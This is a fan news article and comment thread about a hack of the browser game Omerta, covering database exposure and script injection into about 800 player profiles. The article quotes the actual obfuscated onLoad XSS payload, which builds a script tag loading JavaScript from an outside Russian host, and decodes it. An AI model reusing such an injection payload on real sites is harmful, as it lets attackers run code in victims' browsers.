» Menu

» Login

» OB/Site News

Omerta News Integration
Comments: 58 - Views: 55054 - Votes: 0
War rating
Comments: 10 - Views: 26392 - Votes: 4
Reporters Wanted!
Comments: 2 - Views: 18346 - Votes: 3
» Articles
Date Comments Rating

General Comments & Major Rumors
Comments: 57,989 - Views: 15,998,507 - Votes: 81
Article is Locked!
Endless Struggle !
Comments: 514 - Views: 17,780 - Votes: 0
23-09 Reset → 30 September 2022, Friday → 12:00 OT
Comments: 72 - Views: 8,921 - Votes: 0
30-09 Welcome to Round #40!
Comments: 2 - Views: 2,183 - Votes: 0
19-09 Congratulations Reichsthaler!
Comments: 0 - Views: 2,057 - Votes: 0
01-09 Not Penny's boat..
Comments: 72 - Views: 18,367 - Votes: 0
21-08 First Family!
Comments: 6 - Views: 2,610 - Votes: 0
12-08 Welcome to Round #39
Comments: 5 - Views: 2,513 - Votes: 0
03-08 Reset → 12 August 2022, Friday → 10:00 OT
Comments: 17 - Views: 5,265 - Votes: 0
27-07 Congratulations Vengeance!
Comments: 8 - Views: 2,712 - Votes: 0
go back
go forward
» Barafranca News

No news found. Reset in progress?
» Online last 15 minutes

Guests: 520
Total members: 3751
Online: 0 (0%)
Members:
22-09 [Upd #2] Omerta hacked
Author: sbanks
Last updated: 4830d 4h 58m 1s ago by LL
Comments: 164
Views: 68,358
Votes: 0 (0 average)
Version: 3.2
article
Last weekend Omerta had some downtime. Admins posted some news that there was something wrong with the server. Some hardware problem as Brando states.

Barafranca News: Connection problems - fixed

By Brando: There was a hardware problem which was solved by switching that machine off.

We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.

Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.

Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.


In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.

Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!

After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.

They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)

They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.

Barafranca News: Removed Img(s)

onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)


Translation:
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.


This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.

Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.

Update:

Just as more proofs, the hackers has released a list of 515 users with their set testament.

Also they released the Global Vars of the server of Barafranca.

Update 28/09:

After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.

Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.

They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.

Update:

One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.

Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.

We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
comments

Add a YouTube movie Add an image Add a link/url Help
Rix Netherlands (13:02:49 - 29-09)
Link Quote
Shizzz at 12:55:47 on 29/09:
tbh who gives a shit about a hack of omerta? Everything can be hacked if it's done by proper people, nothing to be ashamed of.
I don't get it why 1. beyond makes such a big thing about i and 2. Brando don't want to admit it. It happened, don't give them attention and they will stop
We didn't made a big thing about it from the start, we just reported it, as any newssite would do and does.
Shizzz Belgium (12:55:47 - 29-09)
Link Quote
tbh who gives a shit about a hack of omerta? Everything can be hacked if it's done by proper people, nothing to be ashamed of.
I don't get it why 1. beyond makes such a big thing about i and 2. Brando don't want to admit it. It happened, don't give them attention and they will stop
Rix Netherlands (10:58:26 - 29-09)
Link Quote
Anonymous at 10:19:20 on 29/09:
Brando Omerta NB I offered them a full interview over a week ago. You should be asking them why you did not yet get to read it... I would not suggest that they are 'covering it up', however.
In case someone is wondering, here is the answer for you guys:
Rix at 10:19:38 on 26/09:
Dear Brando,

We always like to take interviews or in any other way put anything up on our site other than the plain war articles. However, being that most of us do not like this version at all and since most of us are busy with real life things, such as school or work, or working on other projects, we, at this moment, do not have the time for an interview, even though we would really like to hear the admin's side of the story. For example, out of our current 8-11 crew members, only 2 are online at least once a day, and only 5 once a week. This is our fault, we know, but blaming us for it is not going to change everything.

Therefore, I kindly suggest to have patience until both parties (Omerta crew and OBN crew) have time or, when you want to have your reply out in the open as soon as possible (which I would understand you want in this certain situation), use your extensive freedom of speech on our site and write an excessive comment including explanations on how these three, for us, coherent, events (downtime, database setup leak and profiles infected with code) could have taken place or a description on what really happened.

Furthermore, I would like to repeat a previous notice of mine that we normally would remove posts including excessive name calling and insults on our journalistic integrity. Please see this as your second warning. Thank you in advance.
Anonymous (10:19:20 - 29-09)
Link Quote
Hiring some new people wont change things if their boss remains using the same logic, planning and more importantly communication.
Brando is to blame, he started an crusade calling all and everything related to these hacks complete fakes.
Then he has to withdraw that statement when Bramble decides to cave in just a little and admit a hack last week for a short window.
Wich we all know is bullshit but ok, its a start right?

And then the hackers released their final proof, a full list of succesors and second succesors, and altho a few weeks old the data proved to be extremely relevant, even now after some fams might have changed them around etc.
And still he's calling fake, hoax and what not.
Read his facebook lately?
Ill give you the cliffnotes:

Brando Omerta
has spent most of the last 2 days waiting for the 'Journalists' of Omerta Beyond to get in touch. Last night I lost my patience and we banned them all.

Brando Omerta Since then they have responded but the key person has not done so satisfactorily. Once he does we can all move on.

Brando Omerta ‎<name> would you like it if I called you 'a liar'? I am pro freedom-of-speech and anti-censorship. This is not about censorship. I won't say any more about it until I have an intelligent response from their side.

Brando Omerta I have not banned their site and will remove all of the personal bans once they wake up and smell the coffee. Nothing personal. Just trying to get their attention.

Brando Omerta NB I offered them a full interview over a week ago. You should be asking them why you did not yet get to read it... I would not suggest that they are 'covering it up', however.

Brando Omerta News I don't mind. Made up shit about me and my colleagues I do.

And now:
Brando Omerta
is leaving you amidst rancour and intrigue. Have a great day!

You can hardly blame the people working under him for stuff if thats the way things are done around there. And Brando was perfectly capable of posting here in the start, yet suddenly he seemed to forget that, Rix posted here dozens of times for him to respond to his email, since the second line of his bann "or contact us on irc' is kinda hard to do while g-lined..
Anonymous (09:56:35 - 29-09)
Link Quote
Anonymous at 18:47:53 on 28/09:
@ Steve/Brando: These ranting fits does nothing but alienate the community that (through donations) helps feed your family. Why not start treating this community as the paying customers we are? Of course there are two sides to every story and I also get tired of the flaming etc... but the latest outbursts on this site along with a history of poor communication has simply alienated your customer base. I stopped donating and only log in for nostalgic reasons - not because I am tired of the game or the friends I have made here but because I will not continue to buy a product with inconsistent service and care. That is my only but very significant power as a consumer. The community is all that is keeping your business alive at the moment. You offer a service and consumers have expectations. This hardly matches up anymore. You and your crew have years of "abusive" (strong word hence the "") behavior towards your customers to rectify and it is just not happening. I became a fan of your proactive approach to scripting but you are lacking an engaged and consistent group of community managers. And you need to refill that prescription of Valium. Talk to your community. Don't treat us like vermin. Make me a customer again.

Just my advice from one business mind to another.


@ Rix and crew: You derelicts! Keep it up and keep it honest. :)

Gigollo (I would not have posted Anonymous if I could just remember that %@&!* password)

Well said! This all boils down to negligence from the management; Please, steve, i beg of you, hire some proper people to handle this game. The ones currently "employed" (do you really pay em for that work?!) are way too emtionally involved in the game and just as dirty as the players trying to be mafia. This aint the red cross, if you expect profit people are going to expect something back. And look! You have all the possibilities in the world mate, just take this talanted bunch of programmers, who dedicated their time and effort into making this newssite, makig up for the poor reporting from "your" side. Throw them a bone man and make friends damnit! You cant shun people for telling the truth, or are you the biggest crook of us all?
Clam (09:09:19 - 29-09)
Link Quote
raviolio at 01:06:52 on 29/09:
read? at 00:37:47 on 29/09:
raviolio at 00:17:43 on 29/09:
Anonymous at 23:14:57 on 28/09:
Anonymous at 20:54:23 on 28/09:
Anonymous at 20:48:20 on 28/09:
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)

Its 2 weeks like the guy said. It was 100% correct back then.


it isn't
my famlog doesn't lie at all
succeror ID doesn't confirm with the succesor, even not before those 2 weeks,
these stats are like correct for here when i go back much more back then 2 weeks

The info is valid, the hackers who published this list just did so to prove that the database has been compromised already, they arent the same ones that this article is originally about.
So the time-frame might be a bit off since this hack took place a while ago, thus the list is somewhat older. But it still proves that people have had access to the omerta database structure in the past thus any statement claiming otherwise is plain false.

Todays newspost actually takes the piss with the entire subject, they found out today that last week for 30minutes their testament page got 'hacked' but they closed that already so all is fine?
Who believes such a bs story.
It will be interesting to see if Brando finally admits hacks did happen in the past which where able to parse actual 'hidden' data and prolly got acces to the entire thing.
Denial is prolly the way he goes tho, which makes him just as worse as anyone that ever had a function in the crew before he stepped up which he blamed for everything.

Solution?:
Admit the fuckup, fix the leaks, reset the 3.2 versions.
He might do part 3, but part 1 and 2 are a whole new ballgame.

i dont see a reset coming anytime soon. the game isnt locked fams that were shot down have come back up already and preparing to shoot again.

did you even read the article ? barafranca got hacked all info is out there.. they know all the successors, they know how many bullets everyone has etc. etc.

thats reason enough for a reset.
yeah i read it. If all that info is out there, it seems more or less even to all fams involved. If the info gained from this is so important, I would expect some shooting soon. But I dont think much will change at all. I think some people just want a reset and jump and anything that is remotely related.

Oh please! Stop whining about bloody reset! Want reset? Do something about .com! Fight, war, kill, suicide! All you guys want is reset every few months after you and your family get raped... Well, no! No reset now or anytime soon - start wars and riot for fucks sake, you and people alike you have made this game so boring for that reason - if you can't win easily, ask for reset! LAME!!
Clam (09:06:37 - 29-09)
Link Quote
One hell of an article! I had no idea what was going on until I've read this now!

Admins can suck it, they've been revealed and exploited!
Anonymous (08:49:27 - 29-09)
Link Quote
ok so now what ? you get like free DC's for a month Rix and co ? lol
I notice they admit they are wrong......

they fail this hard and have a go at you guys akilling , freezing and g-lining only to finally realise(partially atm) that they got hacked to still deny alot of it .... so when in a week they front up and admit they were wrong

i hope you ask for a public apology to be posted on omerta forums latest news or something because he(Brando) pretty much attacked your news site with untrue remarks about the site and abusing people/persons involved with the leak.
( which is great news report btw great work ;) )

im not involved at all but i wanna see them publicly apologise and admit they were wrong.
and if people are unaware or just to unsure whats going on be sure that the post indicates that emails and or passwords MAY need to be changed

now this is unacceptable of course firstly to lie then to cover it up with bullshit to "keep them happy" preety much it seems
i bet those " " words were used in discussing this amongst yourselfs(admins/crew) pathetic effort and to you Steve/Brando you really gotta admit your mistakes and apologise here .... in my opinion there may be more lost players to yet more Admin/Crew Fails ... be sure to pat yourselves on the back when this games dead and gone .. because you gonna cause it all yourself the way you're going

forget scripts and dupes .... we got stupid admins on our hands :')

finally gonna front up to one of your fuck ups Brando ???????? we await the answer and if the answer is no i want a decent answer without abuse explaning why please :)
Anonymous (01:40:49 - 29-09)
Link Quote
Omerta the number 1 retard game, that every e-peen kid plays.
raviolio (01:06:52 - 29-09)
Link Quote
read? at 00:37:47 on 29/09:
raviolio at 00:17:43 on 29/09:
Anonymous at 23:14:57 on 28/09:
Anonymous at 20:54:23 on 28/09:
Anonymous at 20:48:20 on 28/09:
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)

Its 2 weeks like the guy said. It was 100% correct back then.


it isn't
my famlog doesn't lie at all
succeror ID doesn't confirm with the succesor, even not before those 2 weeks,
these stats are like correct for here when i go back much more back then 2 weeks

The info is valid, the hackers who published this list just did so to prove that the database has been compromised already, they arent the same ones that this article is originally about.
So the time-frame might be a bit off since this hack took place a while ago, thus the list is somewhat older. But it still proves that people have had access to the omerta database structure in the past thus any statement claiming otherwise is plain false.

Todays newspost actually takes the piss with the entire subject, they found out today that last week for 30minutes their testament page got 'hacked' but they closed that already so all is fine?
Who believes such a bs story.
It will be interesting to see if Brando finally admits hacks did happen in the past which where able to parse actual 'hidden' data and prolly got acces to the entire thing.
Denial is prolly the way he goes tho, which makes him just as worse as anyone that ever had a function in the crew before he stepped up which he blamed for everything.

Solution?:
Admit the fuckup, fix the leaks, reset the 3.2 versions.
He might do part 3, but part 1 and 2 are a whole new ballgame.

i dont see a reset coming anytime soon. the game isnt locked fams that were shot down have come back up already and preparing to shoot again.

did you even read the article ? barafranca got hacked all info is out there.. they know all the successors, they know how many bullets everyone has etc. etc.

thats reason enough for a reset.
yeah i read it. If all that info is out there, it seems more or less even to all fams involved. If the info gained from this is so important, I would expect some shooting soon. But I dont think much will change at all. I think some people just want a reset and jump and anything that is remotely related.
read? (00:37:47 - 29-09)
Link Quote
raviolio at 00:17:43 on 29/09:
Anonymous at 23:14:57 on 28/09:
Anonymous at 20:54:23 on 28/09:
Anonymous at 20:48:20 on 28/09:
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)

Its 2 weeks like the guy said. It was 100% correct back then.


it isn't
my famlog doesn't lie at all
succeror ID doesn't confirm with the succesor, even not before those 2 weeks,
these stats are like correct for here when i go back much more back then 2 weeks

The info is valid, the hackers who published this list just did so to prove that the database has been compromised already, they arent the same ones that this article is originally about.
So the time-frame might be a bit off since this hack took place a while ago, thus the list is somewhat older. But it still proves that people have had access to the omerta database structure in the past thus any statement claiming otherwise is plain false.

Todays newspost actually takes the piss with the entire subject, they found out today that last week for 30minutes their testament page got 'hacked' but they closed that already so all is fine?
Who believes such a bs story.
It will be interesting to see if Brando finally admits hacks did happen in the past which where able to parse actual 'hidden' data and prolly got acces to the entire thing.
Denial is prolly the way he goes tho, which makes him just as worse as anyone that ever had a function in the crew before he stepped up which he blamed for everything.

Solution?:
Admit the fuckup, fix the leaks, reset the 3.2 versions.
He might do part 3, but part 1 and 2 are a whole new ballgame.

i dont see a reset coming anytime soon. the game isnt locked fams that were shot down have come back up already and preparing to shoot again.

did you even read the article ? barafranca got hacked all info is out there.. they know all the successors, they know how many bullets everyone has etc. etc.

thats reason enough for a reset.
raviolio (00:17:43 - 29-09)
Link Quote
Anonymous at 23:14:57 on 28/09:
Anonymous at 20:54:23 on 28/09:
Anonymous at 20:48:20 on 28/09:
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)

Its 2 weeks like the guy said. It was 100% correct back then.


it isn't
my famlog doesn't lie at all
succeror ID doesn't confirm with the succesor, even not before those 2 weeks,
these stats are like correct for here when i go back much more back then 2 weeks

The info is valid, the hackers who published this list just did so to prove that the database has been compromised already, they arent the same ones that this article is originally about.
So the time-frame might be a bit off since this hack took place a while ago, thus the list is somewhat older. But it still proves that people have had access to the omerta database structure in the past thus any statement claiming otherwise is plain false.

Todays newspost actually takes the piss with the entire subject, they found out today that last week for 30minutes their testament page got 'hacked' but they closed that already so all is fine?
Who believes such a bs story.
It will be interesting to see if Brando finally admits hacks did happen in the past which where able to parse actual 'hidden' data and prolly got acces to the entire thing.
Denial is prolly the way he goes tho, which makes him just as worse as anyone that ever had a function in the crew before he stepped up which he blamed for everything.

Solution?:
Admit the fuckup, fix the leaks, reset the 3.2 versions.
He might do part 3, but part 1 and 2 are a whole new ballgame.

i dont see a reset coming anytime soon. the game isnt locked fams that were shot down have come back up already and preparing to shoot again.
Anonymous (23:14:57 - 28-09)
Link Quote
Anonymous at 20:54:23 on 28/09:
Anonymous at 20:48:20 on 28/09:
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)

Its 2 weeks like the guy said. It was 100% correct back then.


it isn't
my famlog doesn't lie at all
succeror ID doesn't confirm with the succesor, even not before those 2 weeks,
these stats are like correct for here when i go back much more back then 2 weeks

The info is valid, the hackers who published this list just did so to prove that the database has been compromised already, they arent the same ones that this article is originally about.
So the time-frame might be a bit off since this hack took place a while ago, thus the list is somewhat older. But it still proves that people have had access to the omerta database structure in the past thus any statement claiming otherwise is plain false.

Todays newspost actually takes the piss with the entire subject, they found out today that last week for 30minutes their testament page got 'hacked' but they closed that already so all is fine?
Who believes such a bs story.
It will be interesting to see if Brando finally admits hacks did happen in the past which where able to parse actual 'hidden' data and prolly got acces to the entire thing.
Denial is prolly the way he goes tho, which makes him just as worse as anyone that ever had a function in the crew before he stepped up which he blamed for everything.

Solution?:
Admit the fuckup, fix the leaks, reset the 3.2 versions.
He might do part 3, but part 1 and 2 are a whole new ballgame.

Rix Netherlands (21:59:34 - 28-09)
Link Quote
Anonymous at 21:30:02 on 28/09:
sbanks at 21:00:11 on 28/09:
Anonymous at 20:55:33 on 28/09:
maybe a stupid question but i dont really understand, what happened and what effect does it have?

the hackers have all successors of every family, all bullet ammounts, basicly everthing, they know successors, md5 hashed passwords, they know what bodyguards you have, what email you used when you regged your account.

basicly EVERYTHING.

this is confirmed?
We don't know, and unless they decide the publish the whole database will never now. But they definitely had the opportunity, and in terms of cybercrime just as good. Since cybercrime is so unique it is hard to compare it with something our of real life, but you can compare it with a bank of which the front doors are open and the safe door is closed but unlocked and all the employees are all blindfolded and they don't know how much money is inside the safe. Random people could walk in the bank and walk past the clerks and check the safe door and see it's unlocked, then open it and take money, but since we don't know how much money is in it we will never know if and how much they took.

The bank is Omerta, free for players unless the employees decide to close it.
The employees is the Omerta crew, in control but probably can't see if someone tries to attempt something, since that's just how cybercrime works in some situations.
The safe is the database.
The door of the safe is the connection between the pages you see in front of you and the database.
The money inside the safe is the data which includes all our passwords and emails and maybe even telephone numbers.

Now in this hypothetical situation add the given fact that we know that someone has tried to open the safe door and went inside.
rkellylovespee United States (21:49:55 - 28-09)
Link Quote
Anonymous at 21:48:56 on 28/09:
so are they gonna act like nothing happend?

Yes.
Anonymous (21:48:56 - 28-09)
Link Quote
so are they gonna act like nothing happend? or wil this lead to a reset?
Anonymous (21:30:02 - 28-09)
Link Quote
sbanks at 21:00:11 on 28/09:
Anonymous at 20:55:33 on 28/09:
maybe a stupid question but i dont really understand, what happened and what effect does it have?

the hackers have all successors of every family, all bullet ammounts, basicly everthing, they know successors, md5 hashed passwords, they know what bodyguards you have, what email you used when you regged your account.

basicly EVERYTHING.

this is confirmed?
sbanks Guatemala (21:00:11 - 28-09)
Link Quote
Anonymous at 20:55:33 on 28/09:
maybe a stupid question but i dont really understand, what happened and what effect does it have?

the hackers have all successors of every family, all bullet ammounts, basicly everthing, they know successors, md5 hashed passwords, they know what bodyguards you have, what email you used when you regged your account.

basicly EVERYTHING.
rkellylovespee United States (21:00:05 - 28-09)
Link Quote
Confirms my 1st and 2nd successor exactly as it stands now even though my 2nd successor is in the middle of the pack of brugs and has never held a position of any sort in the family.
Anonymous (20:59:19 - 28-09)
Link Quote
Anonymous at 20:55:33 on 28/09:
maybe a stupid question but i dont really understand, what happened and what effect does it have?
well if your don is shot, he can set 2 succersors that will become don if he has been shot

so for example i die,
first succesor = X
2n one = Y

if they shoot X 2sec before me (i die also) Y is capable to take over the DON spot and set 2 persons again A & B for example,

but in case of war, they shoot X & Y 1min before me, directly after that me (as don)
the family is down and the HQ is lost


to make it really easy to explain